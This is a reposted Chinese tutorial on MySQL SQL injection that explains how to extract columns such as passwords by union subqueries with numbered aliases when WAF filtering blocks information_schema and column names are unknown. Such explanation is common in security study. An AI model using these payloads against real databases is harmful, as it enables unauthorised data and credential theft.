不知道列名的情况下注入

栏目: 数据库 · 发布时间: 6年前

内容简介:在 mysql => 5 的版本中存在库在information_schema中,除了SCHEMATA,TABLES,COLUMNS有表信息外,高版本的mysql中,还有INNODB_TABLES及INNODB_COLUMNS中记录着表结构。

不知道列名的情况下注入

在 mysql => 5 的版本中存在库 information_schema ,记录着 mysql 中所有表的结构,通常,在mysql sqli中,我们会通过此库中的表去获取其他表的结构,即表名,列名等。但是这个库也会经常被WAF过滤。当我们通过暴力破解获取到表名后,该如何进行下一步利用呢?

在information_schema中,除了SCHEMATA,TABLES,COLUMNS有表信息外,高版本的mysql中,还有INNODB_TABLES及INNODB_COLUMNS中记录着表结构。

0x01 不使用表名查询

正常的查询如下:

不知道列名的情况下注入

其中,列名为 id , name , pass , mail , phone ,使用union查询

select 1,2,3,4,5 union select * from users;

不知道列名的情况下注入

接着,就可以继续使用数字来对应列,如3对应了表里面的pass:

select `3` from (select 1,2,3,4,5 union select * from users)a;

不知道列名的情况下注入

当 ` 不能使用的时候,使用别名来代替:

select b from (select 1,2,3 as b,4,5 union select * from users)a;

不知道列名的情况下注入

在注入中查询多个列:

select concat(`2`,0x3a,`3`) from (select 1,2,3,4,5 union select * from users)a limit 1,1;

不知道列名的情况下注入

FROM: Extracting data without knowing columns names


以上所述就是小编给大家介绍的《不知道列名的情况下注入》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

正当法律程序简史

正当法律程序简史

(美)约翰·V.奥尔特 / 杨明成、陈霜玲 / 商务印书馆 / 2006-8 / 14.00元

本书的主题——正当法律程序,是英美法的核心概念,它使诸如法治、经济自由、个人自治以及免于政府专断行为的侵害等价值观念具体化,因而是法学领域一个永恒的主题,数百年以来一直是法学家、法官及律师关注的重点。本书以极为简洁、精确的语言总结了五百年法律发展的恢弘历史,为人们描述了正当法律程序观念发展演变的清晰轨迹。而沿着这条轨迹,人们可以准确地了解正当法律程序这一重要概念所包含的广泛的问题。 作为一本......一起来看看 《正当法律程序简史》 这本书的介绍吧!

JS 压缩/解压工具
JS 压缩/解压工具

在线压缩/解压 JS 代码

图片转BASE64编码
图片转BASE64编码

在线图片转Base64编码工具

SHA 加密
SHA 加密

SHA 加密工具